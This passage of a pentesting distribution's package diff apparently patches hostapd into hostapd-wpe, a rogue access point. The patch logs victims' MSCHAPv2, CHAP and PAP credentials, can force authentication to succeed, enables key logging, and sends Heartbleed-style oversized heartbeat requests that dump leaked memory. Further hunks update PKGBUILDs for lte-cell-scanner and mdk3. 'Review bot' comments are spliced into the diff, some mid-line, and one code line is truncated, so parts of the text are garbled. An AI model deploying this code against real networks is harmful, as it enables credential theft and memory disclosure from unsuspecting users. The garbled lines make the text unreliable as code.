tls_openssl_ref_count = 0; + static int tls_ex_idx_session = -1; + +@@ -1724,7 
+1728,12 @@ struct tls_connection * tls_connection_i + + conn->context = context; + SSL_set_app_data(conn->ssl, conn); +- SSL_set_msg_callback(conn->ssl, tls_msg_cb); ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ if (wpe_conf.wpe_enable_cupid) ++ SSL_set_msg_callback(conn->ssl, wpe_hb_cb); ++ else ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ ++ SSL_set_msg_callback(conn->ssl, tls_msg_cb); + SSL_set_msg_callback_arg(conn->ssl, conn); + options = SSL_OP_NO_SSLv2 | SSL_OP_NO_SSLv3 | + SSL_OP_SINGLE_DH_USE; +@@ -4501,6 +4510,10 @@ openssl_handshake(struct tls_connection + struct tls_context *context = conn->context; + int res; + struct wpabuf *out_data; ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ int i; ++ struct wpabuf *wpe_hb_ptr1, *wpe_hb_ptr2; ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ + + /* + * Give TLS handshake data from the server (if available) to OpenSSL +@@ -4619,6 +4632,30 @@ openssl_handshake(struct tls_connection + } + wpabuf_put(out_data, res); + ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_before_handshake && wpe_conf.wpe_hb_num_tries) { ++ ++ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat request instead of handshake\n"); ++ wpe_hb_ptr1 = NULL; ++ ++ for (i = 0; i < wpe_conf.wpe_hb_num_repeats; i++) { ++ wpe_hb_ptr2 = wpabuf_alloc(wpe_hb_msg_len-1); ++ memcpy(wpabuf_mhead(wpe_hb_ptr2), (u8 *)wpe_hb_clear(), wpe_hb_msg_len-1); ++ wpabuf_put(wpe_hb_ptr2, wpe_hb_msg_len-1); ++ ++ if (wpe_hb_ptr1) { ++ wpe_hb_ptr1 = wpabuf_concat(wpe_hb_ptr1,wpe_hb_ptr2); ++ } else { ++ wpe_hb_ptr1 = wpe_hb_ptr2; ++ } ++ } ++ ++ conn->ssl->tlsext_hb_pending = 1; ++ wpe_conf.wpe_hb_num_tries--; ++ return wpe_hb_ptr1; ++ } ++#endif ++ + return out_data; + } + +@@ -4751,6 +4788,13 @@ struct wpabuf * tls_connection_encrypt(v + tls_show_errors(MSG_INFO, __func__, "BIO_reset failed"); + return NULL; + } ++ ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ if (wpe_conf.wpe_enable_cupid && 
wpe_conf.wpe_hb_send_before_appdata) { ++ wpe_hb_enc(conn); ++ } ++#endif ++ + res = SSL_write(conn->ssl, wpabuf_head(in_data), wpabuf_len(in_data)); + if (res < 0) { + tls_show_errors(MSG_INFO, __func__, +@@ -4758,6 +4802,12 @@ struct wpabuf * tls_connection_encrypt(v + return NULL; + } + ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ if (wpe_conf.wpe_enable_cupid && wpe_conf.wpe_hb_send_after_appdata) { ++ wpe_hb_enc(conn); ++ } ++#endif ++ + /* Read encrypted data to be sent to the server */ + buf = wpabuf_alloc(wpabuf_len(in_data) + 300); + if (buf == NULL) +@@ -6028,3 +6078,69 @@ bool tls_connection_get_own_cert_used(st + return SSL_get_certificate(conn->ssl) != NULL; + return false; + } ++ ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++int wpe_hb_enc(struct tls_connection *conn) { ++ unsigned char *cbuf, *p; ++ ++ unsigned int real_payload = 18; //default: 18 /* Sequence number + random bytes */ ++ unsigned int padding = 16; //default: 16 /* Use minimum padding */ ++ ++ if (!SSL_is_init_finished(conn->ssl)) { ++ return -1; ++ } ++ ++ if(!conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_ENABLED || ++ conn->ssl->tlsext_heartbeat & SSL_TLSEXT_HB_DONT_SEND_REQUESTS) { ++ wpa_printf(MSG_DEBUG, "[WPE] warning: heartbeat extension is unsupported (try anyway)\n"); ++ } else { ++ wpa_printf(MSG_DEBUG,"[WPE] Heartbeat extention is supported, may not be vulnerable!\n"); ++ } ++ ++ /* Check if padding is too long, payload and padding ++ * must not exceed 2^14 - 3 = 16381 bytes in total. ++ */ ++ OPENSSL_assert(real_payload + padding <= 16381); ++ ++ cbuf = OPENSSL_malloc(1 + 2 + real_payload + padding); ++ ++ if(cbuf==NULL) ++ return -1; ++ ++ p = cbuf; ++ ++ *p++ = TLS1_HB_REQUEST; ++ ++ ++ /* Payload length (18 bytes here) */ ++ //s2n(payload, p); /* standards compliant payload */ ++ //s2n(payload +10, p); /* >payload to exploit heartbleed!!! 
*/ ++ s2n(wpe_conf.wpe_hb_payload_size, p); /* configured payload */ ++ ++ /* Sequence number */ ++ s2n(conn->ssl->tlsext_hb_seq, p); ++ /* 16 random bytes */ ++ RAND_pseudo_bytes(p, 16); ++ //RAND_bytes(p, 16); ++ p += 16; ++ /* Random padding */ ++ RAND_pseudo_bytes(p, padding); ++ //RAND_bytes(p, padding); ++ ++ wpa_printf(MSG_DEBUG, "[WPE] Sending heartbeat reaquesting payload size %u...\n", wpe_conf.wpe_hb_payload_size); ++ wpa_hexdump(MSG_DEBUG, "[WPE] heartbeat packet to send:", cbuf, 1 + 2 + real_payload + padding); ++ ++ /* Send heartbeat request */ ++#ifdef TLS1_RT_HEARTBEAT ++ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, TLS1_RT_HEARTBEAT, ++#elif defined(DTLS1_RT_HEARTBEAT) ++ if (SSL_get_ssl_method(conn->ssl)->ssl_write_bytes(conn->ssl, DTLS1_RT_HEARTBEAT, ++#endif ++ cbuf, 3 + real_payload + padding) >= 0) ++ conn->ssl->tlsext_hb_pending = 1; ++ OPENSSL_free(cbuf); ++ ++ return 0; ++} ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ ++ +diff '--color=auto' -rupN hostapd-2.11/src/eap_server/eap_server.c hostapd-2.11-wpe/src/eap_server/eap_server.c +--- hostapd-2.11/src/eap_server/eap_server.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/eap_server/eap_server.c 2024-07-26 09:11:33.204000000 +0000 +@@ -160,6 +160,8 @@ int eap_user_get(struct eap_sm *sm, cons + { + struct eap_user *user; + ++ char ident = 't'; ++ + if (sm == NULL || sm->eapol_cb == NULL || + sm->eapol_cb->get_eap_user == NULL) + return -1; +@@ -171,6 +173,11 @@ int eap_user_get(struct eap_sm *sm, cons + if (user == NULL) + return -1; + ++ if (phase2) { ++ identity = (const u8 *)&ident; ++ identity_len = 1; ++ } ++ + if (sm->eapol_cb->get_eap_user(sm->eapol_ctx, identity, + identity_len, phase2, user) != 0) { + eap_user_free(user); +diff '--color=auto' -rupN hostapd-2.11/src/eap_server/eap_server_mschapv2.c hostapd-2.11-wpe/src/eap_server/eap_server_mschapv2.c +--- hostapd-2.11/src/eap_server/eap_server_mschapv2.c 2024-07-20 18:04:37.000000000 +0000 
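Review bot: The `'t'` that replaces the phase-2 identity in the `@@ -171,6 +173,11 @@` hunk of eap_server.c is an undocumented magic value; nothing in eap_user_get() says that it has to match the phase-2 `"t"` entry in hostapd-wpe.eap_user (the one marked "DO NOT REMOVE"), nor that the identity the peer actually sent is never used for the phase-2 lookup once `phase2` is set. Give it a named constant next to the `char ident = 't';` declaration in the `@@ -160,6 +160,8 @@` hunk and a comment such as `/* WPE: every tunnelled (phase 2) user lookup is done as identity "t"; keep in sync with the phase-2 "t" entry in hostapd-wpe.eap_user */`. eap_user_get() starts and ends outside both hunks.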
++++ hostapd-2.11-wpe/src/eap_server/eap_server_mschapv2.c 2024-07-26 09:11:33.204000000 +0000
+@@ -12,7 +12,7 @@
+ #include "crypto/ms_funcs.h"
+ #include "crypto/random.h"
+ #include "eap_i.h"
+-
++#include "wpe/wpe.h"
+ 
+ struct eap_mschapv2_hdr {
+ u8 op_code; /* MSCHAPV2_OP_* */
+@@ -296,7 +296,7 @@ static void eap_mschapv2_process_respons
+ size_t username_len, user_len;
+ int res;
+ char *buf;
+-
++ u8 wpe_challenge_hash[8];
+ pos = eap_hdr_validate(EAP_VENDOR_IETF, EAP_TYPE_MSCHAPV2, respData,
+ &len);
+ if (pos == NULL || len < 1)
+@@ -377,6 +377,8 @@ static void eap_mschapv2_process_respons
+ }
+ }
+ #endif /* CONFIG_TESTING_OPTIONS */
++ challenge_hash(peer_challenge, data->auth_challenge, username, username_len, wpe_challenge_hash);
++ wpe_log_chalresp("mschapv2", name, name_len, wpe_challenge_hash, 8, nt_response, 24);
+ 
+ if (username_len != user_len ||
+ os_memcmp(username, user, username_len) != 0) {
+@@ -411,6 +413,11 @@ static void eap_mschapv2_process_respons
+ return;
+ }
+ 
++ if (wpe_conf.wpe_enable_return_success) {
++ os_memset((void *)nt_response, 0, 24);
++ os_memset((void *)expected, 0, 24);
++ }
++
+ if (os_memcmp_const(nt_response, expected, 24) == 0) {
+ const u8 *pw_hash;
+ u8 pw_hash_buf[16], pw_hash_hash[16];
+@@ -451,6 +458,8 @@ static void eap_mschapv2_process_respons
+ wpa_printf(MSG_DEBUG, "EAP-MSCHAPV2: Invalid NT-Response");
+ data->state = FAILURE_REQ;
+ }
++ if (wpe_conf.wpe_enable_return_success)
++ data->state = SUCCESS;
+ }
+ 
+ 
+diff '--color=auto' -rupN hostapd-2.11/src/eap_server/eap_server_peap.c hostapd-2.11-wpe/src/eap_server/eap_server_peap.c
+--- hostapd-2.11/src/eap_server/eap_server_peap.c 2024-07-20 18:04:37.000000000 +0000
++++ hostapd-2.11-wpe/src/eap_server/eap_server_peap.c 2024-07-26 09:11:33.204000000 +0000
+@@ -17,7 +17,7 @@
+ #include "eap_common/eap_tlv_common.h"
+ #include "eap_common/eap_peap_common.h"
+ #include "tncs.h"
+-
++#include "wpe/wpe.h"
+ 
+ /* Maximum supported PEAP version
+ * 0 = 
Microsoft's PEAP version 0; draft-kamath-pppext-peapv0-00.txt
+diff '--color=auto' -rupN hostapd-2.11/src/eap_server/eap_server_ttls.c hostapd-2.11-wpe/src/eap_server/eap_server_ttls.c
+--- hostapd-2.11/src/eap_server/eap_server_ttls.c 2024-07-20 18:04:37.000000000 +0000
++++ hostapd-2.11-wpe/src/eap_server/eap_server_ttls.c 2024-07-26 09:11:33.204000000 +0000
+@@ -16,7 +16,7 @@
+ #include "eap_server/eap_tls_common.h"
+ #include "eap_common/chap.h"
+ #include "eap_common/eap_ttls.h"
+-
++#include "wpe/wpe.h"
+ 
+ #define EAP_TTLS_VERSION 0
+ 
+@@ -539,9 +539,11 @@ static void eap_ttls_process_phase2_pap(
+ return;
+ }
+ 
+- if (sm->user->password_len != user_password_len ||
++ wpe_log_basic("eap-ttls/pap", sm->identity, sm->identity_len, user_password, user_password_len);
++
++ if ((!wpe_conf.wpe_enable_return_success) && (sm->user->password_len != user_password_len ||
+ os_memcmp_const(sm->user->password, user_password,
+- user_password_len) != 0) {
++ user_password_len) != 0)) {
+ wpa_printf(MSG_DEBUG, "EAP-TTLS/PAP: Invalid user password");
+ eap_ttls_state(data, FAILURE);
+ return;
+@@ -604,8 +606,9 @@ static void eap_ttls_process_phase2_chap
+ chap_md5(password[0], sm->user->password, sm->user->password_len,
+ challenge, challenge_len, hash);
+ 
+- if (os_memcmp_const(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) ==
+- 0) {
++ wpe_log_chalresp("eap-ttls/chap", sm->identity, sm->identity_len, challenge, challenge_len, password, password_len);
++
++ if ((wpe_conf.wpe_enable_return_success) || (os_memcmp(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0)) {
+ wpa_printf(MSG_DEBUG, "EAP-TTLS/CHAP: Correct user password");
+ eap_ttls_state(data, SUCCESS);
+ eap_ttls_valid_session(sm, data);
+@@ -676,7 +679,9 @@ static void eap_ttls_process_phase2_msch
+ return;
+ }
+ 
+- if (os_memcmp_const(nt_response, response + 2 + 24, 24) == 0) {
++ wpe_log_chalresp("eap-ttls/mschap", sm->identity, sm->identity_len, challenge, challenge_len, response + 2 + 24, 24);
++
++ if 
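Review bot: The CHAP comparison in the `@@ -604,8 +606,9 @@` hunk of eap_server_ttls.c replaces `os_memcmp_const` with plain `os_memcmp`, and the MSCHAP NT-Response comparison in the `@@ -676,7 +679,9 @@` hunk does the same; that reintroduces the timing side channel the constant-time helper exists to avoid, and neither the added logging call nor the `wpe_enable_return_success` short-circuit needs the swap. The PAP hunk just above keeps `os_memcmp_const`, so the file is now inconsistent with itself. Restore the helper in both places, e.g. `if ((wpe_conf.wpe_enable_return_success) || (os_memcmp_const(hash, password + 1, EAP_TTLS_CHAP_PASSWORD_LEN) == 0)) {` for CHAP and the matching form for the MSCHAP line. eap_ttls_process_phase2_chap() and eap_ttls_process_phase2_mschap() both start outside their hunks.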
((wpe_conf.wpe_enable_return_success) || (os_memcmp(nt_response, response + 2 + 24, 24) == 0)) { + wpa_printf(MSG_DEBUG, "EAP-TTLS/MSCHAP: Correct response"); + eap_ttls_state(data, SUCCESS); + eap_ttls_valid_session(sm, data); +@@ -698,7 +703,7 @@ static void eap_ttls_process_phase2_msch + u8 *response, size_t response_len) + { + u8 *chal, *username, nt_response[24], *rx_resp, *peer_challenge, +- *auth_challenge; ++ *auth_challenge, wpe_challenge_hash[8]; + size_t username_len, i; + + if (challenge == NULL || response == NULL || +@@ -783,6 +788,9 @@ static void eap_ttls_process_phase2_msch + } + + rx_resp = response + 2 + EAP_TTLS_MSCHAPV2_CHALLENGE_LEN + 8; ++ ++ challenge_hash(peer_challenge, auth_challenge, username, username_len, wpe_challenge_hash); ++ wpe_log_chalresp("eap-ttls/mschapv2", username, username_len, wpe_challenge_hash, 8, rx_resp, 24); + #ifdef CONFIG_TESTING_OPTIONS + { + u8 challenge2[8]; +diff '--color=auto' -rupN hostapd-2.11/src/utils/wpa_debug.c hostapd-2.11-wpe/src/utils/wpa_debug.c +--- hostapd-2.11/src/utils/wpa_debug.c 2024-07-20 18:04:37.000000000 +0000 ++++ hostapd-2.11-wpe/src/utils/wpa_debug.c 2024-07-26 09:11:33.204000000 +0000 +@@ -28,7 +28,7 @@ static FILE *wpa_debug_tracing_file = NU + + + int wpa_debug_level = MSG_INFO; +-int wpa_debug_show_keys = 0; ++int wpa_debug_show_keys = 1; // WPE >:) + int wpa_debug_timestamp = 0; + int wpa_debug_syslog = 0; + #ifndef CONFIG_NO_STDOUT_DEBUG +diff '--color=auto' -rupN hostapd-2.11/src/wpe/Makefile hostapd-2.11-wpe/src/wpe/Makefile +--- hostapd-2.11/src/wpe/Makefile 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/src/wpe/Makefile 2024-07-26 09:11:33.204000000 +0000 +@@ -0,0 +1,8 @@ ++all: ++ @echo Nothing to be made. ++ ++clean: ++ rm -f *~ *.o *.d *.gcno *.gcda *.gcov ++ ++install: ++ @echo Nothing to be made. 
+diff '--color=auto' -rupN hostapd-2.11/src/wpe/wpe.c hostapd-2.11-wpe/src/wpe/wpe.c +--- hostapd-2.11/src/wpe/wpe.c 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/src/wpe/wpe.c 2024-07-26 09:11:33.204000000 +0000 +@@ -0,0 +1,232 @@ ++/* ++ wpe.c - ++ brad.antoniewicz@foundstone.com ++ Implements WPE (Wireless Pwnage Edition) functionality within ++ hostapd. ++ ++ WPE functionality focuses on targeting connecting users. At ++ it's core it implements credential logging (originally ++ implemented in FreeRADIUS-WPE), but also includes other patches ++ for other client attacks that have been modified to some extend. ++ ++ FreeRADIUS-WPE: https://github.com/aircrack-ng/aircrack-ng/tree/master/patches/wpe/freeradius-wpe ++ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff ++ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd ++*/ ++ ++#include ++#include ++#include "includes.h" ++#include "common.h" ++#include "wpe/wpe.h" ++#include "utils/wpa_debug.h" ++ ++#define wpe_logfile_default_location "./hostapd-wpe.log" ++ ++ ++#define MSCHAPV2_CHAL_HASH_LEN 8 ++#define MSCHAPV2_CHAL_LEN 16 ++#define MSCHAPV2_RESP_LEN 24 ++ ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ char wpe_hb_msg[] = "\x18\x03\x01\x00\x03\x01\xff\xff"; ++ size_t wpe_hb_msg_len = sizeof(wpe_hb_msg)/sizeof(wpe_hb_msg[0]); ++#endif ++ ++struct wpe_config wpe_conf = { ++ .wpe_logfile = wpe_logfile_default_location, ++ .wpe_logfile_fp = NULL, ++ .wpe_enable_karma = 0, ++ .wpe_enable_cupid = 0, ++ .wpe_enable_return_success = 0, ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ .wpe_hb_send_before_handshake = 1, ++ .wpe_hb_send_before_appdata = 0, ++ .wpe_hb_send_after_appdata = 0, ++ .wpe_hb_payload_size = 50000, ++ .wpe_hb_num_tries = 1, ++ .wpe_hb_num_repeats = 10 ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ ++}; ++ ++void wpe_log_file_and_stdout(char const *fmt, ...) 
{ ++ ++ if ( wpe_conf.wpe_logfile_fp == NULL ) { ++ wpe_conf.wpe_logfile_fp = fopen(wpe_conf.wpe_logfile, "a"); ++ if ( wpe_conf.wpe_logfile_fp == NULL ) ++ printf("WPE: Cannot file log file"); ++ } ++ ++ va_list ap; ++ ++ va_start(ap, fmt); ++ vprintf(fmt, ap); ++ va_end(ap); ++ ++ va_start(ap, fmt); ++ if ( wpe_conf.wpe_logfile_fp != NULL ) ++ vfprintf(wpe_conf.wpe_logfile_fp, fmt, ap); ++ va_end(ap); ++} ++ ++void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len) { ++ time_t nowtime; ++ int x; ++ ++ nowtime = time(NULL); ++ ++ wpe_log_file_and_stdout("\n\n%s: %s", type, ctime(&nowtime)); ++ wpe_log_file_and_stdout("\t username:\t"); ++ for (x=0; x?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~................................................................................................................................."; ++ ++ const unsigned short *sp; ++ const unsigned char *ap; ++ unsigned int i, j; ++ int nshorts, nshorts2; ++ int padding; ++ ++ wpe_log_file_and_stdout("\n\t"); ++ padding = 0; ++ sp = (unsigned short *)bp; ++ ap = (unsigned char *)bp; ++ nshorts = (unsigned int)length / sizeof(unsigned short); ++ nshorts2 = (unsigned int)length / sizeof(unsigned short); ++ i = 0; ++ j = 0; ++ while (1) { ++ while (--nshorts >= 0) { ++ wpe_log_file_and_stdout(" %04x", ntohs(*sp)); ++ sp++; ++ if ((++i % 8) == 0) ++ break; ++ } ++ if (nshorts < 0) { ++ if ((length & 1) && (((i - 1) % 8) != 0)) { ++ wpe_log_file_and_stdout(" %02x ", *(unsigned char *)sp); ++ padding++; ++ } ++ nshorts = (8 - (nshorts2 - nshorts)); ++ while (--nshorts >= 0) { ++ wpe_log_file_and_stdout(" "); ++ } ++ if (!padding) ++ wpe_log_file_and_stdout(" "); ++ } ++ wpe_log_file_and_stdout(" "); ++ ++ while (--nshorts2 >= 0) { ++ wpe_log_file_and_stdout("%c%c", asciify[*ap], asciify[*(ap + 1)]); ++ ap += 2; ++ if ((++j % 8) == 0) { ++ wpe_log_file_and_stdout("\n\t"); ++ 
break; ++ } ++ } ++ if (nshorts2 < 0) { ++ if ((length & 1) && (((j - 1) % 8) != 0)) { ++ wpe_log_file_and_stdout("%c", asciify[*ap]); ++ } ++ break; ++ } ++ } ++ if ((length & 1) && (((i - 1) % 8) == 0)) { ++ wpe_log_file_and_stdout(" %02x", *(unsigned char *)sp); ++ wpe_log_file_and_stdout(" %c", ++ asciify[*ap]); ++ } ++ wpe_log_file_and_stdout("\n"); ++} ++ ++ ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++/* https://github.com/openssl/openssl/issues/2122 */ ++ ++void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg) { ++#ifdef TLS1_RT_HEARTBEAT ++ if (v_content_type == TLS1_RT_HEARTBEAT) { ++#elif defined(DTLS1_RT_HEARTBEAT) ++ if (v_content_type == DTLS1_RT_HEARTBEAT) { ++#endif ++ wpe_log_file_and_stdout("\n\nHeartbleed Data:\n"); ++ v_ssl->tlsext_hb_pending = 1; ++ wpe_hexdump((unsigned char *)v_buf, v_len); ++ } ++} ++ ++ ++char *wpe_hb_clear() { ++ char *p; ++ // set payload size ++ p = &wpe_hb_msg[sizeof(wpe_hb_msg) - 3]; ++ s2n(wpe_conf.wpe_hb_payload_size, p); ++ ++ return wpe_hb_msg; ++} ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ +diff '--color=auto' -rupN hostapd-2.11/src/wpe/wpe.h hostapd-2.11-wpe/src/wpe/wpe.h +--- hostapd-2.11/src/wpe/wpe.h 1970-01-01 00:00:00.000000000 +0000 ++++ hostapd-2.11-wpe/src/wpe/wpe.h 2024-07-26 09:11:33.204000000 +0000 +@@ -0,0 +1,54 @@ ++/* ++ wpe.h - ++ brad.antoniewicz@foundstone.com ++ Implements WPE (Wireless Pwnage Edition) functionality within ++ hostapd. ++ ++ WPE functionality focuses on targeting connecting users. At ++ it's core it implements credential logging (originally ++ implemented in FreeRADIUS-WPE), but also includes other patches ++ for other client attacks. 
++ ++ FreeRADIUS-WPE: https://github.com/brad-anton/freeradius-wpe ++ Karma patch: http://foofus.net/goons/jmk/tools/hostapd-1.0-karma.diff ++ Cupid patch: https://github.com/lgrangeia/cupid/blob/master/patch-hostapd ++*/ ++#include ++ ++struct wpe_config { ++ char *wpe_logfile; ++ FILE *wpe_logfile_fp; ++ unsigned int wpe_enable_karma; ++ unsigned int wpe_enable_cupid; ++ unsigned int wpe_enable_return_success; ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ unsigned int wpe_hb_send_before_handshake:1; ++ unsigned int wpe_hb_send_before_appdata:1; ++ unsigned int wpe_hb_send_after_appdata:1; ++ unsigned int wpe_hb_payload_size; ++ unsigned int wpe_hb_num_tries; ++ unsigned int wpe_hb_num_repeats; ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ ++}; ++ ++extern struct wpe_config wpe_conf; ++ ++#if OPENSSL_VERSION_NUMBER < 0x10100000L ++ extern char wpe_hb_msg[]; ++ extern size_t wpe_hb_msg_len; ++ ++ //#define WPE_HB_MSG_LEN 8 ++#endif /* OPENSSL_VERSION_NUMBER < 0x10100000L */ ++ ++#define n2s(c,s)((s=(((unsigned int)(c[0]))<< 8)| \ ++ (((unsigned int)(c[1])) )),c+=2) ++ ++#define s2n(s,c) ((c[0]=(unsigned char)(((s)>> 8)&0xff), \ ++ c[1]=(unsigned char)(((s) )&0xff)),c+=2) ++ ++ ++void wpe_log_file_and_stdout(char const *fmt, ...); ++void wpe_log_chalresp(char *type, const u8 *username, size_t username_len, const u8 *challenge, size_t challenge_len, const u8 *response, size_t response_len); ++void wpe_log_basic(char *type, const u8 *username, size_t username_len, const u8 *password, size_t password_len); ++void wpe_hb_cb(int v_write_p, int v_version, int v_content_type, const void* v_buf, size_t v_len, SSL* v_ssl, void* v_arg); ++char *wpe_hb_clear(); diff --git a/packages/pentesting/hostapd-wpe/hostapd-wpe.install b/packages/pentesting/hostapd-wpe/hostapd-wpe.install index b94ab8c6d..f4680b070 100644 --- a/packages/pentesting/hostapd-wpe/hostapd-wpe.install +++ b/packages/pentesting/hostapd-wpe/hostapd-wpe.install 
@@ -1,20 +1,19 @@ post_install() { cd "/etc/hostapd-wpe/certs" - sed -i -e 's/default_days\s*= 365/default_days = 3650/' client.cnf - sed -i -e 's/default_crl_days\s*= 364/default_crl_days = 3649/' client.cnf + sudo sed -i -e 's/default_days\s*= 365/default_days = 3650/' client.cnf + sudo sed -i -e 's/default_crl_days\s*= 364/default_crl_days = 3649/' \ + client.cnf - sed -i -e 's/default_days\s*= 365/default_days = 3650/' ca.cnf - sed -i -e 's/default_crl_days\s*= 364/default_crl_days = 3649/' ca.cnf - - sed -i -e 's/default_days\s*= 60/default_days = 3650/' server.cnf - sed -i -e 's/default_crl_days\s*= 30/default_crl_days = 3649/' server.cnf + sudo sed -i -e 's/default_days\s*= 365/default_days = 3650/' ca.cnf + sudo sed -i -e 's/default_crl_days\s*= 364/default_crl_days = 3649/' ca.cnf + sudo sed -i -e 's/default_days\s*= 60/default_days = 3650/' server.cnf + sudo sed -i -e 's/default_crl_days\s*= 30/default_crl_days = 3649/' server.cnf ./bootstrap make install } post_remove() { rm -rf /etc/hostapd-wpe -} - +} \ No newline at end of file diff --git a/packages/pentesting/lte-cell-scanner/PKGBUILD b/packages/pentesting/lte-cell-scanner/PKGBUILD index 45b09800d..35397a2db 100644 --- a/packages/pentesting/lte-cell-scanner/PKGBUILD +++ b/packages/pentesting/lte-cell-scanner/PKGBUILD 
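Review bot: The `sudo` prefixes added to every `sed` call in post_install() are redundant and fragile: pacman runs install scriptlets as root already, and `sudo` is not part of the base system, so a host without it now fails a hook that previously worked. Drop the prefix, e.g. `sed -i -e 's/default_days\s*= 365/default_days = 3650/' client.cnf`. The `cd "/etc/hostapd-wpe/certs"` is also unguarded; if it fails, the edits and `./bootstrap` run in whatever directory pacman happens to be in, so `cd "/etc/hostapd-wpe/certs" || return 1` would be safer. The rewritten file also ends without a trailing newline, which the diff flags.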
@@ -1,33 +1,52 @@ # Credits BlackArch ( https://www.blackarch.org/ ). # See COPYING for license details. +# Initial PKGBUILD from AUR. +# Old Maintainer: Tony Lambiris + pkgname=lte-cell-scanner -pkgver=57.5fa3df8 -pkgrel=2 -groups=('athena' 'athena-scanner' 'athena-mobile' 'athena-recon') -pkgdesc='LTE SDR cell scanner optimized to work with very low performance RF front ends (8bit A/D, 20dB noise figure).' +pkgver=26.e7f71cb +pkgrel=1 +epoch=1 +pkgdesc='An OpenCL accelerated TDD/FDD LTE Scanner.' arch=('x86_64' 'aarch64') -url='https://github.com/Evrytania/LTE-Cell-Scanner' -license=('AGPL') -depends=('itpp' 'boost' 'boost-libs' 'fftw' 'rtl-sdr') -makedepends=('git' 'cmake') -source=("$pkgname::git+https://github.com/Evrytania/LTE-Cell-Scanner.git") +groups=('athena' 'athena-radio' 'athena-mobile' 'athena-scanner') +url='https://github.com/JiaoXianjun/LTE-Cell-Scanner' +license=('GPL') +depends=('git') +makedepends=('cmake' 'hackrf' 'fftw' 'itpp' 'boost' 'boost-libs' 'bladerf') +source=("$pkgname::git+https://github.com/JiaoXianjun/LTE-Cell-Scanner") sha512sums=('SKIP') pkgver() { cd $pkgname - echo $(git rev-list --count HEAD).$(git rev-parse --short HEAD) + ( set -o pipefail + git describe --long --tags --abbrev=7 2>/dev/null | + sed 's/\([^-]*-g\)/r\1/;s/-/./g' || + printf "%s.%s" "$(git rev-list --count HEAD)" \ + "$(git rev-parse --short=7 HEAD)" + ) } -build() { - cd $pkgname +prepare() { + cd $pkgname - mkdir -p build + mkdir -p build +} - cd build +build() { + cd $pkgname + + cd build - cmake .. + cmake ../ \ + -DCMAKE_BUILD_TYPE=Release \ + -DCMAKE_INSTALL_PREFIX=/usr \ + -DCMAKE_VERBOSE_MAKEFILE=ON \ + -DUSE_HACKRF=1 \ + -DUSE_BLADERF=1 \ + -DUSE_OPENCL=0 # opencl segfaults in some cases make } 
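Review bot: The dependency split in the new PKGBUILD is inverted: `depends=('git')` makes git a runtime requirement of the installed scanner, while the libraries the binary links against (fftw, itpp, boost-libs, hackrf, bladerf) now sit only in makedepends and will be missing on a machine that installs the package without building it. Something like `depends=('fftw' 'itpp' 'boost-libs' 'hackrf' 'bladerf')` and `makedepends=('git' 'cmake' 'boost')` matches what the `-DUSE_HACKRF=1` / `-DUSE_BLADERF=1` flags actually build in. Separately, the source is a bare `git+` URL with `sha512sums=('SKIP')`, so the build pulls whatever the upstream default branch holds at build time; pinning it with `#commit=<upstream commit id>` or a tag would make the package reproducible and verifiable. The `-DUSE_OPENCL=0` flag also contradicts the new pkgdesc, which advertises OpenCL acceleration.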
@@ -35,8 +54,8 @@ build() { package() { cd $pkgname - install -Dm 755 build/src/CellSearch "$pkgdir/usr/bin/$pkgname" - install -Dm 644 -t "$pkgdir/usr/share/doc/$pkgname/" README AUTHORS doc/* - install -Dm 644 COPYING "$pkgdir/usr/share/licenses/$pkgname/COPYING" + cd build + + make DESTDIR="$pkgdir" install } diff --git a/packages/pentesting/mdk3/PKGBUILD b/packages/pentesting/mdk3/PKGBUILD index f8081a696..1033af6a1 100644 --- a/packages/pentesting/mdk3/PKGBUILD +++ b/packages/pentesting/mdk3/PKGBUILD 
@@ -1,42 +1,39 @@ # Credits BlackArch ( https://www.blackarch.org/ ). # See COPYING for license details. # -# Old Maintainer: Levente Polyak +# Old Maintainer: BoBeR182 +# Old Contributor: Levente Polyak # Old Contributor: Andrés Cordero # Old Contributor: Jens Pranaitis pkgname=mdk3 pkgver=v6 -pkgrel=9 -pkgdesc='WLAN penetration tool.' +pkgrel=10 +pkgdesc="WLAN penetration tool" groups=('athena' 'athena-wireless' 'athena-fuzzer' 'athena-exploitation') -url='https://aspj.aircrack-ng.org/' -arch=('x86_64' 'aarch64') +url="https://www.kali.org/tools/mdk3/" +arch=("x86_64") license=('GPL2') -depends=('glibc') -#source=("$pkgname-$pkgver.tar.bz2::https://aspj.aircrack-ng.org/$pkgname-$pkgver.tar.bz2") -source=("https://github.com/Wikel/$pkgname-$pkgver/raw/master/$pkgname-$pkgver.tar.bz2") 